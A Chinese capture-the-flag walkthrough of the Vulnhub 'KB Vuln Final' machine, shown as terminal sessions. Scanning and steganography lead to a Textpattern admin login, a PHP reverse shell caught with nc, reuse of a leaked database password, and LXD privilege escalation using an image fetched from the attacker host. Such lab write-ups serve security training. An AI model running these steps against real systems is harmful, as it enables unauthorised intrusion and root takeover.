Vulnhub之KB Vuln Final靶机详细测试过程

KB Vuln Final

作者: jason huawen

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:ab:da:3f      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.184  08:00:27:0e:f6:a9      1      60  PCS Systemtechnik GmbH         

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.184

NMAP扫描

──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.184 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-11 22:15 EDT
Nmap scan report for localhost (192.168.56.184)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cd:15:fb:cc:47:de:a3:16:e9:b8:6b:61:7a:25:5a:b7 (RSA)
|   256 82:a5:1b:08:06:12:c0:36:38:e7:53:18:47:ea:3f:f8 (ECDSA)
|_  256 f4:d9:65:bd:7d:68:03:31:c3:64:06:48:1d:fb:e7:47 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hacked!
| http-git: 
|   192.168.56.184:80/.git/
|     Git repository found!
|     .gitignore matched patterns 'bug'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN...
|     Remotes:
|       https://github.com/textpattern/textpattern.git
|_    Project type: node.js application (guessed from .gitignore)
MAC Address: 08:00:27:0E:F6:A9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http),并且nmap扫描结果可知目标主机站点有.git/目录。

获得Shell

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ gobuster dir -u http://192.168.56.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt --exclude-length 10333
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.184
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          10333
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2023/04/11 22:20:55 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.184/images/]
/files                (Status: 301) [Size: 316] [--> http://192.168.56.184/files/]
/themes               (Status: 301) [Size: 317] [--> http://192.168.56.184/themes/]
/sites                (Status: 301) [Size: 316] [--> http://192.168.56.184/sites/]
/README.txt           (Status: 200) [Size: 1152]
/INSTALL.txt          (Status: 200) [Size: 3094]
/LICENSE.txt          (Status: 200) [Size: 15170]
/rpc                  (Status: 301) [Size: 314] [--> http://192.168.56.184/rpc/]
/HISTORY.txt          (Status: 200) [Size: 70459]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/UPGRADE.txt          (Status: 200) [Size: 3492]
/server-status        (Status: 403) [Size: 279]
Progress: 1034080 / 1323366 (78.14%)^C
[!] Keyboard interrupt detected, terminating.


Gosuter工具发现了/sites目录

浏览器访问80端口,访问/sites目录,并逐级进入下一层目录,

http://192.168.56.184/sites/site1/admin/

访问该目录,得知目标主机运行textpattern内容管理系统,因此访问:

http://192.168.56.184/textpattern

访问该URL,得到用户登录界面,查看页面源代码看到主机名kb.final,将其加入/etc/hosts文件中:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ cat /etc/hosts                       
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.184  kb.final

其实作者在首页就给出提示search me: machineboy141

利用搜索引擎搜索该黑客

https://github.com/machineboy141/KB-DUMP

将文件下载到Kali Linux

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf yunus.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek yunus.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "steganopayload1125574.txt".
[i] Extracting to "yunus.jpg.out".

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf serpil.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek serpil.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.72% (133.1 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf omer.jpg  
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek omer.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""

[i] Original filename: "steganopayload202720.txt".
[i] Extracting to "omer.jpg.out".
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf mehmet.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek mehmet.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.94% (133.4 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf emre.jpg  
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek emre.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "steganopayload1125546.txt".
[i] Extracting to "emre.jpg.out".

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf elif.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek elif.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.89% (133.3 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ steghide extract -sf deniz.jpg 
Enter passphrase: 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ stegseek deniz.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.77% (133.1 MB)           
[!] error: Could not find a valid passphrase.
                                              

其中有3个图片可破解出隐写信息

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat yunus.jpg.out 
http://kb.final/textpattern/                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat omer.jpg.out 
25>:?                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ cat emre.jpg.out 
6K3:C4:>6a_a_                                       

用网站识别加密算法

https://www.dcode.fr/cipher-identifier

识别为ROT 47

界面得到:ezbircime2020 admin

用该密码登录http://kb.final/textpattern

密码应该是ezbircime2021

成功登陆textpattern管理后台,然后将shell.php上传

shell.php应该在/files/目录下

http://kb.final/files/shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4/KB-DUMP]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.184] 41448
Linux kb-server 4.15.0-134-generic #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 03:07:18 up 59 min,  0 users,  load average: 0.00, 0.02, 0.98
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python

这样就得到了目标主机反弹回来的shell

ww-data@kb-server:/var/www/html/textpattern/textpattern$ cat config.php
cat config.php
<?php
$txpcfg['db'] = 'textpattern';
$txpcfg['user'] = 'textuser';
$txpcfg['pass'] = 'ghostroot510';
$txpcfg['host'] = 'localhost';
$txpcfg['table_prefix'] = '';
$txpcfg['txpath'] = '/var/www/html/textpattern/textpattern';
$txpcfg['dbcharset'] = 'utf8mb4';
// For more customization options, please consult config-dist.php file.

www-data@kb-server:/var/www/html/textpattern/textpattern$ cd /home
cd /home
www-data@kb-server:/home$ ls 
ls 
machineboy
www-data@kb-server:/home$ su - machineboy
su - machineboy
Password: ghostroot510

发现数据库连接的密码就是machineboy的密码,成功切换

提权

machineboy@kb-server:~$ id
id
uid=1000(machineboy) gid=1000(machineboy) groups=1000(machineboy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

可以利用lxd进行提权

┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ git clone  https://github.com/saghul/lxd-alpine-builder.git

Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 2.07 MiB/s, done.
Resolving deltas: 100% (15/15), done.
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ ls     
GitHack  GitHack.py  KB-DUMP  lxd-alpine-builder  nmap_full_scan
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/KBVuln4]
└─$ cd lxd-alpine-builder       

machineboy@kb-server:/tmp$ wget http://192.168.56.230:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-04-12 03:24:57--  http://192.168.56.230:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_0139.tar.g 100%[============================================================================>]   3.11M  --.-KB/s    in 0.02s   

2023-04-12 03:24:57 (190 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

machineboy@kb-server:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04

Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
machineboy@kb-server:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Apr 12, 2023 at 3:25am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
machineboy@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
machineboy@kb-server:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
machineboy@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
machineboy@kb-server:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
machineboy@kb-server:/tmp$ lxc start ignite
machineboy@kb-server:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls
bin             etc             lib             lost+found      proc            snap            tmp             vmlinuz.old
boot            home            lib32           media           root            srv             usr
cdrom           initrd.img      lib64           mnt             run             swap.img        var
dev             initrd.img.old  libx32          opt             sbin            sys             vmlinuz
/mnt/root # cd root
/mnt/root/root # ls -alh
total 32K    
drwx------    4 root     root        4.0K Jan 24  2021 .
drwxr-xr-x   26 root     root        4.0K Jan 24  2021 ..
-rw-------    1 root     root           0 Jan 24  2021 .bash_history
-rw-r--r--    1 root     root        3.0K Apr  9  2018 .bashrc
drwxr-xr-x    3 root     root        4.0K Jan 24  2021 .local
-rw-------    1 root     root         145 Jan 24  2021 .mysql_history
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
drwx------    2 root     root        4.0K Jan 24  2021 .ssh
-rw-------    1 root     root         240 Jan 24  2021 root.txt
/mnt/root/root # cat root.txt
 ________________
< congratulations >
 ----------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
 
                          kernelblog.org
                          
cdf323526dbbd53d572d485fdd37d518
/mnt/root/root # 

至此拿到了root flag

热门相关:老子是癞蛤蟆   刺客之王   刺客之王   第一神算:纨绔大小姐   寂静王冠